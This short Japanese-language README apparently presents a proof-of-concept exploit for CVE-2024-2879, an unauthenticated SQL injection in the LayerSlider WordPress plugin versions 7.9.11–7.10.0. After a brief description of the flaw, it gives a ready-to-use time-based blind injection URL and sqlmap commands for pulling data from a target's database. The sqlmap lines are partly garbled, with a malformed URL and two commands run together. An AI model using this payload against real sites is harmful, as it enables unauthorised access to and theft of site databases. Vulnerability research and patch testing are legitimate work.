
CVE-2024-2879 の概念実証エクスプロイト: LayerSlider WordPress プラグイン (7.9.11-7.10.0) における未認証の SQL インジェクション。データベース情報を抽出するためのスキャナスクリプトと SQLMap エクスプロイトガイドが含まれています。
LayerSlider 7.9.11 - 7.10.0 - 認証されていないSQLインジェクション
WordPress用のLayerSliderプラグインは、バージョン7.9.11および7.10.0において、ls_get_popup_markupアクションを介したSQLインジェクションに対して脆弱です。これは、ユーザーが指定したパラメータに対する不十分なエスケープと、既存のSQLクエリに対する十分な準備の欠如に起因します。これにより、認証されていない攻撃者が既存のクエリに追加のSQLクエリを付加し、データベースから機密情報を抽出することが可能になります。

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq"
5秒の応答遅延

または
sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=Tsqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T